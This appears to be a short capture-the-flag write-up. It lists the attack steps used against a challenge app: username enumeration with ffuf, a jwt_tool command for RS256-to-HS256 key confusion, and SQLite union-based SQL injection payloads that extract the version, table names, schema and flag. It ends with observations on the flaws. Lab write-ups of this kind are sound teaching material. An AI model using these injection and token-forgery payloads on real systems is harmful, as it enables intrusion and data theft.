Under Construction
Last updated
Was this helpful?
Last updated
Was this helpful?
ffuf -request req -w ../../usernames.txt -mr exists -u -s
Usernames:
gale
rosie
ā¢ Key Confusion [RS256 > HS256]
./jwt_tool.py -t -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
ā¢ sqlite_version()
<> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
ā¢ table name
-I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
ā¢ column names [table create query in output is referred to check the column names]
-I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
ā¢ flag
-I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "
-------------------------------------------------
observations:
-------------------------------------------------
ā¢ JWT public key is present in JWT token
ā¢ Enumerate usernames
ā¢ JWT key confusion due to accepting both RS256 and HS256
ā¢ sqli is present on getUser request as input not escaped